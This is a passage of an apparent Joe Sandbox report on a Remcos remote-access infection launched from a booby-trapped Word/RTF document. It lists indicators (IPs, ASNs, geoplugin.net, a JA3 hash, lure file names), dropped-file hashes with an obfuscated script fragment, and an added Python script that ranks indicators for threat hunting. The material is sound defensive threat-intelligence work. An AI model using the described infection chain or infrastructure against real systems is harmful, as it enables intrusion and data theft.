  XQmV6MKs53.exe | malicious | Remcos | context: geoplugin.net/json.gp
Match (domain) | Associated Sample Name / URL | Detection | Threat Name | Context
Match: ia601706.us.archive.org
  INV_00983.xls | malicious | Remcos | context: 207.241.227.96
  Enquiry.vbs | malicious | PXRECVOWEIWOEI Stealer | context: 207.241.227.96
  RFQ_0230909024SEPT.xla.xlsx | malicious | Remcos | context: 207.241.227.96
  xrrwwstCMd.docx | malicious | Remcos | context: 207.241.227.96
Match: geoplugin.net
  INV_00983.xls | malicious | Remcos | context: 178.237.33.50
  rfq_last_quater_product_purchase_order_import_list_11_06_2024_000000110924.cmd | malicious | GuLoader, Remcos | context: 178.237.33.50
  ORDER DATASHEET.bat | malicious | Remcos, GuLoader | context: 178.237.33.50
  rfq_final_product_purchase_order_import_list_10_09_2024_00000024.cmd | malicious | GuLoader, Remcos | context: 178.237.33.50
  HSBC E-Statement Doc_pdf.exe | malicious | Remcos | context: 178.237.33.50
  RFQ_0230909024SEPT.xla.xlsx | malicious | Remcos | context: 178.237.33.50
  xrrwwstCMd.docx | malicious | Remcos | context: 178.237.33.50
  fYHJsEQSv0.exe | malicious | Remcos | context: 178.237.33.50
  PxPsy1hml9.exe | malicious | Remcos, PureLog Stealer | context: 178.237.33.50
  XQmV6MKs53.exe | malicious | Remcos | context: 178.237.33.50
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context
Match: CMCSUS
  xrrwwstCMd.docx | malicious | Remcos | context: 45.89.247.65
  PO FT-151-2024 PETROMAT.xls | malicious | Remcos | context: 45.90.89.98
  SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf | malicious | Remcos | context: 45.89.247.65
  INV4092401.docx.doc | malicious | Remcos | context: 45.89.247.65
  Document#.exe | malicious | Remcos | context: 45.89.247.84
  t7A1BhMgJ2.exe | malicious | Remcos | context: 45.89.247.135
  Swift Payment.xls | malicious | FormBook | context: 45.89.247.151
  aS4XS9m23e.exe | malicious | RedLine | context: 85.209.133.187
  PO-014842-2.xls | malicious | FormBook | context: 45.89.247.151
Match: INTERNET-ARCHIVEUS
  INV_00983.xls | malicious | Remcos | context: 207.241.227.96
  Proforma invoices_1.js | malicious | Unknown | context: 207.241.227.86
  Enquiry.vbs | malicious | PXRECVOWEIWOEI Stealer | context: 207.241.227.96
  Demande de devis.Quote Request.js | malicious | PXRECVOWEIWOEI Stealer | context: 207.241.227.86
  Orden-de-Compra-OC_17407.xlam.xlsx | malicious | AgentTesla | context: 207.241.232.154
  RFQ_0230909024SEPT.xla.xlsx | malicious | Remcos | context: 207.241.227.96
  xrrwwstCMd.docx | malicious | Remcos | context: 207.241.227.96
  SecuriteInfo.com.Exploit.CVE-2017-11882.123.15030.28858.rtf | malicious | Remcos | context: 207.241.224.2
  PO FT-151-2024 PETROMAT.xls | malicious | Remcos | context: 207.241.232.154
  Inquiry_0476452.xls | malicious | Remcos | context: 207.241.224.2
Match: CMCSUS
  xrrwwstCMd.docx | malicious | Remcos | context: 45.89.247.65
  PO FT-151-2024 PETROMAT.xls | malicious | Remcos | context: 45.90.89.98
  SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf | malicious | Remcos | context: 45.89.247.65
  INV4092401.docx.doc | malicious | Remcos | context: 45.89.247.65
  Document#.exe | malicious | Remcos | context: 45.89.247.84
  t7A1BhMgJ2.exe | malicious | Remcos | context: 45.89.247.135
  Swift Payment.xls | malicious | FormBook | context: 45.89.247.151
  aS4XS9m23e.exe | malicious | RedLine | context: 85.209.133.187
  PO-014842-2.xls | malicious | FormBook | context: 45.89.247.151
Match (JA3 fingerprint) | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 05af1f5ca1b87cc9cc9b25185115607d
  INV_00983.xls | malicious | Remcos | context: 207.241.227.96
  SWIFT DETAILS-ERROR.docx.doc | malicious | Snake Keylogger, VIP Keylogger | context: 207.241.227.96
  Orden-de-Compra-OC_17407.xlam.xlsx | malicious | AgentTesla | context: 207.241.227.96
  SecuriteInfo.com.Exploit.CVE-2018-0798.4.26981.24309.rtf | malicious | Snake Keylogger, VIP Keylogger | context: 207.241.227.96
  2000 EUR.doc | malicious | SmokeLoader | context: 207.241.227.96
  RFQ_0230909024SEPT.xla.xlsx | malicious | Remcos | context: 207.241.227.96
  xrrwwstCMd.docx | malicious | Remcos | context: 207.241.227.96
  SecuriteInfo.com.Exploit.CVE-2017-11882.123.15030.28858.rtf | malicious | Remcos | context: 207.241.227.96
  PO FT-151-2024 PETROMAT.xls | malicious | Remcos | context: 207.241.227.96
  Inquiry_0476452.xls | malicious | Remcos | context: 207.241.227.96
                                                No context
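Added example, not part of the Joe Sandbox report: a small pivot-quality check over the context tables above. The threat-name lists are transcribed from the IP, domain, ASN and JA3 tables (one entry per associated sample, in table order); the duplicated CMCSUS block is counted once. The scoring scheme (share of Remcos samples, number of distinct families sharing the indicator) is this example's own, not a Joe Sandbox metric.

```python
"""Rank the indicators in this report's context tables by how Remcos-specific they are.

Added example; not part of the Joe Sandbox report. The threat-name lists are
transcribed from the IP, domain, ASN and JA3 context tables above, one entry
per associated sample, in table order. Nothing else is assumed.
"""
from collections import Counter

# The IP 178.237.33.50 and the domain geoplugin.net carry the same ten samples.
GEOPLUGIN_SAMPLES = [
    "Remcos", "GuLoader, Remcos", "Remcos, GuLoader", "GuLoader, Remcos",
    "Remcos", "Remcos", "Remcos", "Remcos", "Remcos, PureLog Stealer", "Remcos",
]

# "Unknown" is kept as the report prints it and therefore counts as a family.
# The CMCSUS block is printed twice in the report with identical rows; counted once.
REMCOS_CONTEXT = {
    "ip:178.237.33.50": GEOPLUGIN_SAMPLES,
    "domain:geoplugin.net": GEOPLUGIN_SAMPLES,
    "domain:ia601706.us.archive.org": [
        "Remcos", "PXRECVOWEIWOEI Stealer", "Remcos", "Remcos",
    ],
    "asn:CMCSUS": ["Remcos"] * 6 + ["FormBook", "RedLine", "FormBook"],
    "asn:INTERNET-ARCHIVEUS": [
        "Remcos", "Unknown", "PXRECVOWEIWOEI Stealer", "PXRECVOWEIWOEI Stealer",
        "AgentTesla", "Remcos", "Remcos", "Remcos", "Remcos", "Remcos",
    ],
    "ja3:05af1f5ca1b87cc9cc9b25185115607d": [
        "Remcos", "Snake Keylogger, VIP Keylogger", "AgentTesla",
        "Snake Keylogger, VIP Keylogger", "SmokeLoader",
        "Remcos", "Remcos", "Remcos", "Remcos", "Remcos",
    ],
}


def families(threat_name):
    """Split a Joe Sandbox threat-name cell ("GuLoader, Remcos") into family names."""
    return [f.strip() for f in threat_name.split(",") if f.strip()]


def pivot_quality(context, family="Remcos"):
    """Per indicator: how many associated samples carry `family`, and how many
    distinct families share the indicator. A high share with few families means
    a usable pivot for that family; many families means shared infrastructure
    or a generic client fingerprint."""
    out = {}
    for indicator, threats in context.items():
        seen = Counter(f for t in threats for f in families(t))
        hits = sum(1 for t in threats if family in families(t))
        out[indicator] = {
            "samples": len(threats),
            "family_hits": hits,
            "share": hits / len(threats),
            "distinct_families": len(seen),
            "other_families": sorted(f for f in seen if f != family),
        }
    return out


def rank(context, family="Remcos"):
    """Best pivots first: highest share of `family`, then fewest distinct families."""
    q = pivot_quality(context, family)
    return sorted(q, key=lambda i: (-q[i]["share"], q[i]["distinct_families"], i))


if __name__ == "__main__":
    q = pivot_quality(REMCOS_CONTEXT)
    for ind in rank(REMCOS_CONTEXT):
        r = q[ind]
        print(f"{ind:40} {r['family_hits']:2}/{r['samples']:<2} Remcos  "
              f"{r['distinct_families']} families  other={r['other_families']}")
```

Read the output with two caveats. geoplugin.net is a public geolocation API that Remcos queries after injection (the JSON dropped by RegAsm.exe below is that response), so its 10/10 Remcos share reflects the family's habit, not infrastructure the operator controls; pivot on it together with the contacted IP and ASN rather than alone. The JA3 hash is shared here with Snake Keylogger, AgentTesla and SmokeLoader samples, so it identifies a TLS client stack, not the family.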
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):4760
                                                Entropy (8bit):4.834060479684549
                                                Encrypted:false
                                                SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):0.34726597513537405
                                                Encrypted:false
                                                SSDEEP:3:Nlll:Nll
                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:@...e...........................................................
                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):201378
                                                Entropy (8bit):3.847772100519103
                                                Encrypted:false
                                                SSDEEP:3072:iaYYlq9WoCfvvB9Fgt5p/Gw/5Iy76AOJfBsbApxn7J:pYn9WNZ9l6sPn7J
                                                MD5:E586CEE8737A0875953BE251A6B08BE7
                                                SHA1:2C85EE38F519317E7885A1956D2B573D270A4CE4
                                                SHA-256:2320B989A0EEA128BC497E4390B30B4B4AEA61A0B6E1325CE74D4E23D6F751B5
                                                SHA-512:82306269D32E2E91A86ACEBEDC2866CA98400BC5DDF27FB9CE38B65A991693CE597BF5B36E1C10659BB168E6DF9D0E603270A075B2B3CCEAFCC61C4E1CF1E645
                                                Malicious:false
                                                Preview:..L.L.b.Z.u.i.k.i.R.L.e.A.h. .=. .".z.W.L.d.R.f.O.i.L.i.h.G.Q.".....f.x.W.k.A.W.A.p.I.k.W.G.p. .=. .".o.N.p.K.b.e.b.t.g.m.k.L.t.".....b.z.p.o.e.C.k.u.O.W.T.J.B. .=. .".A.l.K.L.c.N.S.P.W.n.L.m.u.".....L.k.U.p.b.e.n.A.u.Z.R.z.a. .=. .".p.K.l.h.K.h.L.U.n.s.b.b.i.".....p.R.p.t.b.L.A.L.p.Z.f.L.f. .=. .".G.U.H.H.a.T.G.L.R.K.G.g.U.".....m.A.W.Z.L.i.j.N.A.N.W.c.W. .=. .".W.k.n.h.W.c.W.K.u.L.b.q.P.".....G.G.i.Z.C.f.n.p.R.o.f.o.t.a.j. .=. .".p.i.G.W.u.K.t.G.W.f.L.W.W.".....Z.W.N.B.Z.i.g.f.k.g.W.O.A. .=. .".Z.k.W.W.H.d.L.L.x.T.i.U.i.".....e.P.A.L.J.v.L.Q.W.K.A.U.j. .=. .".f.K.G.U.t.h.K.s.B.C.b.m.L.".....U.L.c.W.L.T.Z.U.k.W.N.K.n. .=. .".z.a.W.L.h.n.d.U.L.h.L.i.t.".........W.u.G.a.i.c.L.N.f.K.Z.p.L. .=. .".b.p.o.K.i.K.c.h.N.A.b.c.R.".....b.H.G.g.L.R.G.P.u.d.t.i.O. .=. .".h.c.W.K.x.G.b.d.G.L.Z.o.B.".....J.h.d.U.u.l.L.N.s.e.T.W.L. .=. .".o.t.C.U.L.L.L.i.G.Z.Q.Z.I.".....S.W.N.H.e.i.N.h.o.n.e.W.K. .=. .".S.c.h.K.C.v.O.G.t.Q.k.T.K.".....H.B.B.c.O.i.T.h.u.N.Q.L.f. .=. .".b.k.Z.f.o.d.K.p.q.k.p.A.W.".....
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):962
                                                Entropy (8bit):5.013811273052389
                                                Encrypted:false
                                                SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                                SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                                SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                                SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                                Malicious:false
                                                Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):9216
                                                Entropy (8bit):5.016591174521353
                                                Encrypted:false
                                                SSDEEP:96:8uWGMP9X6WYN0OIsdDugBWomSMgbEANX6WYz0OIsdDugBWomS:8uuPJgtIE6BSnZCtIE6BS
                                                MD5:24287C2FA4F766074FEFC1EE2468D2A6
                                                SHA1:D50CC8339067F6BCAC20243ECE613EDA68010584
                                                SHA-256:2F80C70BD530609C9D78F8D972AB3351442FE5687DC5F2CAA223781AD3923385
                                                SHA-512:998802A73D10D588B8217ECE193973B553BF2C930547510073640795BA48D6EE0257E79B707A56BFC78DBA250D65A35E4A9A0DE744BFAB21752A5DFCBFE5D740
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1536
                                                Entropy (8bit):1.357318797251612
                                                Encrypted:false
                                                SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlb2:IiiiiiiiiifdLloZQc8++lsJe1Mz1
                                                MD5:60AC920EB69959816D302A9FA841971B
                                                SHA1:3272B68FF94A99A33AD8FB64FF39FE3BD7A20FDB
                                                SHA-256:E4F569714EFF922E7F637001ECCBA6512A93DD45295F48B0F7E164ECA4199E37
                                                SHA-512:B7A99C192BC754AC2DB9429468A9E4908384CC7C64807C85C52D4E1F555057B85A6F745280AAAC24A8A5E0F70BE3254AA5A880ABE72A837AA4CBD018493AEA39
                                                Malicious:false
                                                Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):14368
                                                Entropy (8bit):3.6025182679098706
                                                Encrypted:false
                                                SSDEEP:384:IkUc0n1APGHHfW8lzxvdvQ3ys3lhMZ42IscAyGBX7:Ify+HeKd3eD1yBX7
                                                MD5:E8F75CB741A61768884DFCC773415EC2
                                                SHA1:F3A3FA89ED29996798B151B1C86CC0CF9D3EBB9E
                                                SHA-256:9E49E4DB6E0A7D6DA6460A3846029CA449C14A38B566771AC783A12C89262EC2
                                                SHA-512:FA238609FE141E28709D781345D2E04D1B9E8E9AD7797C06F38B79107E42E865058EB39B48FA43D8E918F028F57709C46795B20FACFA0222B9F9205C41BDC0E3
                                                Malicious:false
                                                Preview:....................0.4.7.3.1.8.1.7.<.^.3.?.!.0.6.].$.+.?.).?.%.?.5.4.[.;.5.>.(.#.!.8.(...6.:.!.5._.`.&.[.`.=.).%.2.%.`.&.?.?.7.8.[.4.-.3.?./...-.<.).|.;.8.5.].>.$.3.(.;.?.7.+.>._.%.%...,.;.5.7.;.?.[.;.%.8...0...<.?.7.5.@...'.5.(.8.$.2.?.6.=.#.).7.'.4.(.|.:.9.1.,.,./.+.).6.&.:.4.&.'.5.6.%.?.7.?.?.=.?...*.].=.9.?.4.5.%._.7.2.).$.-.@.3.#.$.[.(.1.?.?...0.@.....).%.>.*.2.1./...?.5.?.@.:._.5.|...!.2.@.@.7.;.?.&.$.).=.&.?.,./.%.2.:.6.?.4.+.[.,.[.+.:.).-.$.(.).].*.?.7.<.|.8./..._.8.9.-.#.~.(.5...+.?.9.7.%.>...?.....1.?.@.$.^.1.|.9.#...[.&.4.5.(.%.2.%.:.0.?.5.%.8.:.'.<...^._.?.<.:.6.6.-.$.~...&.*./.^.?.6.,.9.[.?.:.*.5...%.`.,.7.9.?.3.?.1.0.?.>.$.?...6.?.3.3.&.1.^.>.=.*.:.?.?./.4.8.).?.:.?.?._.$.8.`.[.8.:.`.0.9.0.?./.%...>...%.&.?.'.?.@.?.,.?.7._.~.(.1.7.6.%.3.`.|.?.5.`.!.0.<.(...(.7.,.4.%.).$...@.?.'.0.&...,.#.9...$.:.`.;.?.?.*.*.6.~.6.?.@.4.#.;.?...?.?.(.8.'...:._.&.4.5.,.[.;...8.[.%.7.:.!.~.%.6.?.4.<.@.9.).&.?.^.6./.].~.?.6...&.'.8.'._.6.0.(.(.4.<.!.4.?.8.%.0.1.~.'.1.4.....;.9._.;.;.!.?...6.
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1024
                                                Entropy (8bit):0.05390218305374581
                                                Encrypted:false
                                                SSDEEP:3:ol3lYdn:4Wn
                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                Malicious:false
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Preview:1
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):422
                                                Entropy (8bit):7.501823841517196
                                                Encrypted:false
                                                SSDEEP:12:sx9ha/JXXf2a3XwLCELfvq/7mIfqb9Rewqfrbj:A9iXv2a3X+zSzTeAz
                                                MD5:093662983B41A60A68ECD4E8373032CB
                                                SHA1:2FDB8E1FC22C44A5F0F0F2A7102AEF67218D3CA1
                                                SHA-256:5F13C65845BCCDBA8B629DE0AE1F0CC796AA92871047BE33139736642DE48B61
                                                SHA-512:7F91FBFE1E1F11045E3B90E8EA58F6A6B8C1FC1DFC9B757226C0C2D99BBB3AC395D7088CBAFB424F34E0310799443428FFB7980288EF7B64C9EDE0EFD5128D94
                                                Malicious:false
                                                Preview:.=.........7.@..OL.X.y.v..$..C..5....IZn..E....4[.......r.I.Y..5f.'...>.LC.Z..?r.`kH...E;1M..yc8..d.8t3+ ......4.....Re.../.x......w.i.5.5/.R.....'.pk..@]A...$U.....u..Un.x.yF.|oX.?...\.0..r9..:.`..!DO.I.#.'.<.......k...(..........b.wd.~k...S@..mPc.QT.............8.w...w..-.v...`) y.y..4..|(H..u..+.....z.4.-.0. ..\.{....!...l.S..IG8Cx..P..-.fo.N........{...... ..mv.r.......}......Dwc.F....
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Preview:1
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Preview:1
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Preview:1
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Generic INItialization configuration [folders]
                                                Category:dropped
                                                Size (bytes):45
                                                Entropy (8bit):4.391635874011299
                                                Encrypted:false
                                                SSDEEP:3:HW+JYm4xyJYv:HfRC
                                                MD5:D240725AD9D93A0E089CCB91CCF5A50A
                                                SHA1:3A40E3A01A78C2CBB0743793854366FD50415E25
                                                SHA-256:C778C9755842E662C40A77D9F47476F094DD4FDBA01D7D316D95DE9DE5461EC4
                                                SHA-512:84A4C492D53CF94F89ADA6A1C13AF4419112A2879EBAB093EABB4B6FB328A215D7E86BE4BA8B1A82AD8ACDDE0A4DE089F6B2F933B16C68245EF116B6DCAC46E7
                                                Malicious:false
                                                Preview:[misc]..xnHel.LNK=0..[folders]..xnHel.LNK=0..
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:18 2023, mtime=Fri Aug 11 15:42:18 2023, atime=Wed Sep 11 17:22:11 2024, length=116087, window=hide
                                                Category:dropped
                                                Size (bytes):985
                                                Entropy (8bit):4.523501837731987
                                                Encrypted:false
                                                SSDEEP:12:80tPVxRgXg/XAlCPCHaXPMB1lzB/hMjX+WUbbjbicvb3MDtZ3YilMMEpxRljKGwx:80Zn/XT/MFIKbbKeIDv3qHwq57u
                                                MD5:C8E1BA257FA4543968DCCA096AA5B767
                                                SHA1:2C42381080814FCE92017B06F3B1DA799F3FE6C3
                                                SHA-256:B169210A31E96F43AE31515EF07CEF8F46C4827F2A598030B4FF3E1115E18515
                                                SHA-512:D95BBEE918192BF3FE37D89CA8DB0AD1D6070963B6A5EB414AF8ED8A049AAB0F75FF5C73FBE132FDE34F281F7B31A471FF41AA0D884CABE498F1F73C4DBD8403
                                                Malicious:false
                                                Preview:L..................F.... .......r.......r....l#.w...w............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....+Y...user.8......QK.X+Y.*...&=....U...............A.l.b.u.s.....z.1......WK...Desktop.d......QK.X.WK.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....X.2.w...+Y. .xnHel.rtf.@.......WJ..WJ.*.........................x.n.H.e.l...r.t.f.......s...............-...8...[............?J......C:\Users\..#...................\\579569\Users.user\Desktop\xnHel.rtf. .....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.x.n.H.e.l...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......579569..........D_....3N...W...9..W.e8...8.....[D_....3N...W...9..W.e8...8.....[....
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.503835550707526
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyVFuAGlYViuWCHlkkAi/lln:vdsCkWteuAyYLvAyll
                                                MD5:5A248DD99654CB4793F2457BEE4E69C1
                                                SHA1:9DA63BD05ECA3E441B135C705B425B562E5CA494
                                                SHA-256:73FA49E819EEA9D2CA5024559E4730AC8EE873B526EA79B35082C2ED6E644C0A
                                                SHA-512:1FDB3C71240EBA121A74E2F770F17E30DB67D5812445A7FFB8AA85BE224BA36A5F3CCF818D84EA44579815F5F065AC911D2016F4DC1E4FE64073B3AF4CED3EBB
                                                Malicious:false
                                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):201378
                                                Entropy (8bit):3.847772100519103
                                                Encrypted:false
                                                SSDEEP:3072:iaYYlq9WoCfvvB9Fgt5p/Gw/5Iy76AOJfBsbApxn7J:pYn9WNZ9l6sPn7J
                                                MD5:E586CEE8737A0875953BE251A6B08BE7
                                                SHA1:2C85EE38F519317E7885A1956D2B573D270A4CE4
                                                SHA-256:2320B989A0EEA128BC497E4390B30B4B4AEA61A0B6E1325CE74D4E23D6F751B5
                                                SHA-512:82306269D32E2E91A86ACEBEDC2866CA98400BC5DDF27FB9CE38B65A991693CE597BF5B36E1C10659BB168E6DF9D0E603270A075B2B3CCEAFCC61C4E1CF1E645
                                                Malicious:true
